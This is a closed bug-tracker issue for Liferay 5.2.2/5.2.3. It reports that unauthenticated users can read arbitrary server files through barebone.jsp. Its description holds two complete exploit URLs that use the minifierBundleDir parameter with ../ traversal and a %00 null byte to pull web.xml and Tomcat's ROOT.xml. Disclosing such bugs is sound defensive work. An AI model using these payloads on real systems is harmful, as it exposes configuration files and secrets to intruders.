Details

    • Type: Bug
    • Status: Closed
    • Resolution: Fixed
    • Affects Version/s: 5.2.2, 5.2.3
    • Fix Version/s: 5.2.3
    • Component/s: None
    • Labels:
      None
    • Environment:
      Liferay 5.2.2 or 5.2.3, Tomcat 6.0, Java 6, Linux
    • Branch Version/s:
      5.1.x
    • Backported to Branch:
      Committed

      Description

      Using a variation of these URLS can allow an unauthenticated user to gain read-level access to potentially any file on the filesystem that the user running the app server has access to.

      The following URL results in the content of web.xml file being displayed: http://<host>/html/js/barebone.jsp?browserId=firefox&themeId=BoschStExtranet&colorSchemeId=01&minifierType=js&minifierBundleId=javascript.barebone.files&minifierBundleDir=/WEB-INF/web.xml%00bla&t=1240585586000

      Files below the base directory can also be accessed. The following URL is an example which receives the ROOT.xml config file: http://<host>/html/js/barebone.jsp?browserId=firefox&themeId=BoschStExtranet&colorSchemeId=01&minifierType=js&minifierBundleId=javascript.barebone.files&minifierBundleDir=/../../conf/Catalina/localhost/ROOT.xml%00bla&t=1240585586000

        Attachments

          Issue Links

            Activity

              People

              • Votes:
                0 Vote for this issue
                Watchers:
                0 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:
                  Days since last comment:
                  10 years, 17 weeks, 2 days ago

                  Packages

                  Version Package
                  5.2.3